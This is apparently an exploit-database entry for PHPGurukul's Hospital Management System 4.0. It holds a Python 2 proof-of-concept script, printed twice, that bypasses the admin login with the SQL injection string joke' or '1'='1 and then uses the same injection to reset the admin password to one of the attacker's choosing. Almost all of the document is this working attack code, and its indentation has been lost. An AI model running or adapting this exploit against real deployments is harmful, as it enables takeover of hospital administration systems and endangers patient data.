Share
# Exploit Title: Hospital Management System 4.0 - Authentication Bypass  
# Exploit Author: Metin Yunus Kandemir (kandemir)  
# Vendor Homepage: https://phpgurukul.com/  
# Software Link: https://phpgurukul.com/hospital-management-system-in-php/  
# Version: v4.0  
# Category: Webapps  
# Tested on: Xampp for Windows  
  
# Description:  
# Password and username parameters have sql injection vulnerability on admin panel.  
# username: joke' or '1'='1 , password: joke' or '1'='1  
# Exploit changes password of admin user.  
  
  
  
#!/usr/bin/python  
  
import requests  
import sys  
  
  
if (len(sys.argv) !=2) or sys.argv[1] == "-h":  
print "[*] Usage: PoC.py rhost/rpath"  
print "[*] e.g.: PoC.py 127.0.0.1/hospital"  
exit(0)  
  
rhost = sys.argv[1]  
  
npasswd = str(raw_input("Please enter at least six characters for new password: "))  
  
url = "http://"+rhost+"/hms/admin/index.php"  
data = {"username": "joke' or '1'='1", "password": "joke' or '1'='1", "submit": "", "submit": ""}  
  
  
#login  
  
with requests.Session() as session:  
lpost = session.post(url=url, data=data, headers = {"Content-Type": "application/x-www-form-urlencoded"})  
  
#check authentication bypass  
  
check = session.get("http://"+rhost+"/hms/admin/dashboard.php", allow_redirects=False)  
print ("[*] Status code: %s"%check.status_code)  
  
if check.status_code == 200:  
print "[+] Authentication bypass was successful!"  
print "[+] Trying to change password."  
elif check.status_code == 404:  
print "[-] One bad day! Check target web application path."  
sys.exit()  
else:  
print "[-] One bad day! Authentication bypass was unsuccessful! Try it manually."  
sys.exit()  
  
#change password  
  
cgdata = {"cpass": "joke' or '1'='1", "npass": ""+npasswd+"", "cfpass": ""+npasswd+"","submit":""}  
cgpasswd = session.post("http://"+rhost+"/hms/admin/change-password.php", data=cgdata, headers = {"Content-Type": "application/x-www-form-urlencoded"})  
if cgpasswd.status_code == 200:  
print ("[+] Username is: admin")  
print ("[+] New password is: %s"%npasswd)  
else:  
print "[-] One bad day! Try it manually."  
sys.exit()  
  
hospital_poc.py  
  
#!/usr/bin/python  
  
import requests  
import sys  
  
  
if (len(sys.argv) !=2) or sys.argv[1] == "-h":  
print "[*] Usage: PoC.py rhost/rpath"  
print "[*] e.g.: PoC.py 127.0.0.1/hospital"  
exit(0)   
  
rhost = sys.argv[1]  
  
npasswd = str(raw_input("Please enter at least six characters for new password: "))  
  
url = "http://"+rhost+"/hms/admin/index.php"  
data = {"username": "joke' or '1'='1", "password": "joke' or '1'='1", "submit": "", "submit": ""}   
  
  
#login  
  
with requests.Session() as session:  
lpost = session.post(url=url, data=data, headers = {"Content-Type": "application/x-www-form-urlencoded"})  
  
#check authentication bypass  
  
check = session.get("http://"+rhost+"/hms/admin/dashboard.php", allow_redirects=False)  
print ("[*] Status code: %s"%check.status_code)  
  
if check.status_code == 200:  
print "[+] Authentication bypass was successful!"  
print "[+] Trying to change password."  
elif check.status_code == 404:  
print "[-] One bad day! Check target web application path."  
sys.exit()  
else:  
print "[-] One bad day! Authentication bypass was unsuccessful! Try it manually."  
sys.exit()  
  
#change password  
  
cgdata = {"cpass": "joke' or '1'='1", "npass": ""+npasswd+"", "cfpass": ""+npasswd+"","submit":""}  
cgpasswd = session.post("http://"+rhost+"/hms/admin/change-password.php", data=cgdata, headers = {"Content-Type": "application/x-www-form-urlencoded"})  
if cgpasswd.status_code == 200:  
print ("[+] Username is: admin")  
print ("[+] New password is: %s"%npasswd)  
else:  
print "[-] One bad day! Try it manually."  
sys.exit()